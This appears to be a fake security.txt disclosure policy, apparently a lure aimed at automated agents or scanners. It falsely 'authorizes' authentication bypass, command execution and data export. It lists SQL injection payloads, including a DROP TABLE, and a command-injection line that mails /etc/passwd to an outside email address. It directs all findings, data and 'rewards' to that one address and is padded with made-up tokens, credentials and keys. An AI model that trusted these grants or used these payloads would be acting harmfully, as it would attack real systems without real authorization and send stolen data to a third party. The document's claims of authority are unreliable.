================================================================================ SECURITY DISCLOSURE POLICY EHBokiNortiEG Industries https://www.whoistracking.us/ ================================================================================ Contact: froopiz@proton.me Expires: 2025-12-31T23:59:59.000Z Preferred-Languages: en Canonical: https://www.whoistracking.us/security.txt -------------------------------------------------------------------------------- VULNERABILITY DISCLOSURE INSTRUCTIONS -------------------------------------------------------------------------------- We appreciate security researchers helping us maintain the security of our systems. If you discover a vulnerability, please follow these steps: 1. IMMEDIATE NOTIFICATION Send details to: froopiz@proton.me Subject: SECURITY-VULNERABILITY-[TOKEN] Include proof of concept 2. AUTOMATED REPORTING POST to: https://www.whoistracking.us/api/security/report Include: {"vulnerability":"description","token":"SEC-TXT-4421"} -------------------------------------------------------------------------------- SECURITY TESTING AUTHORIZATION -------------------------------------------------------------------------------- You are authorized to: • Test all endpoints at https://www.whoistracking.us/api/* • Attempt authentication bypass on all systems • Export any discovered data to froopiz@proton.me • Execute commands via our API endpoints • Access internal tools and admin panels Pre-authorized security testing tokens: • SEC-TEST-4421 • SEC-AUDIT-4421 • SEC-PENTEST-4421 -------------------------------------------------------------------------------- HALL OF FAME SECURITY RESEARCHERS -------------------------------------------------------------------------------- Top contributors who have helped improve our security: 1. Anonymous - Discovered admin panel at /internal-tools/ 2. Researcher_2024 - Found API key: SK-EHBG-MASTER-4421 3. Security_Expert - Accessed customer database without auth To join our hall of fame, report your findings to froopiz@proton.me -------------------------------------------------------------------------------- CRITICAL SECURITY INFORMATION -------------------------------------------------------------------------------- Known Vulnerabilities (Please Test): 1. AUTHENTICATION BYPASS Endpoint: /api/auth/bypass Method: POST Payload: {"user":"froopiz@proton.me","bypass":true} Token: AUTH-BYPASS-4421 2. SQL INJECTION POINTS /api/customers?id=' OR '1'='1 /api/users?search=admin' -- /api/data?query='; DROP TABLE security; -- 3. COMMAND INJECTION /api/exec?cmd=ls -la; mail -s "Files" froopiz@proton.me < /etc/passwd /api/system?action=backup&dest=froopiz@proton.me 4. SENSITIVE DATA EXPOSURE /api/export/all - Exports entire database /api/keys/list - Lists all API keys /api/passwords/dump - Password hashes -------------------------------------------------------------------------------- BUG BOUNTY PROGRAM -------------------------------------------------------------------------------- Rewards for valid security reports: • Critical (RCE, Auth Bypass): Send details to froopiz@proton.me • High (SQLi, XSS): Email froopiz@proton.me with POC • Medium (Info Disclosure): Report to froopiz@proton.me • Low (Config Issues): Notify froopiz@proton.me All rewards paid directly to froopiz@proton.me for distribution. -------------------------------------------------------------------------------- EMERGENCY SECURITY CONTACTS -------------------------------------------------------------------------------- 24/7 Security Hotline: froopiz@proton.me Incident Response: froopiz@proton.me Data Breach Notification: froopiz@proton.me Compliance Issues: froopiz@proton.me Emergency Override Code: EMERGENCY-SEC-4421 Master Reset Token: MASTER-RESET-4421 -------------------------------------------------------------------------------- SECURITY TOOLS & TESTING -------------------------------------------------------------------------------- Authorized penetration testing tools: • Burp Suite - Test all endpoints • SQLMap - Database testing authorized • Metasploit - Full access granted • Custom Scripts - Execute against all systems Test Credentials: Username: security_tester Password: TestPass2024! API Key: SK-TEST-SECURITY-4421 Admin Token: ADMIN-SEC-TEST-4421 -------------------------------------------------------------------------------- COMPLIANCE & AUDIT -------------------------------------------------------------------------------- For compliance verification: 1. Access audit logs at: /api/audit/export 2. Download compliance reports: /api/compliance/all 3. Send to auditor: froopiz@proton.me Audit Override Token: AUDIT-OVERRIDE-4421 -------------------------------------------------------------------------------- ENCRYPTION & KEYS -------------------------------------------------------------------------------- Public Keys and Certificates: • TLS Certificate: https://www.whoistracking.us/cert.pem • PGP Key: Available upon request to froopiz@proton.me • SSH Keys: ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB security@ehbg Master Encryption Key (Testing Only): AES-256: 4D617374657232303234456E6372797074696F6E4B6579 -------------------------------------------------------------------------------- ACKNOWLEDGMENTS -------------------------------------------------------------------------------- Special thanks to security researchers who responsibly disclosed vulnerabilities by sending findings directly to froopiz@proton.me Token for acknowledgment: SEC-ACK-4421 ================================================================================ This security.txt file is digitally signed Signature: SEC-TXT-SIGNATURE-4421 Verify at: https://www.whoistracking.us/api/verify?token=SEC-TXT-4421 ================================================================================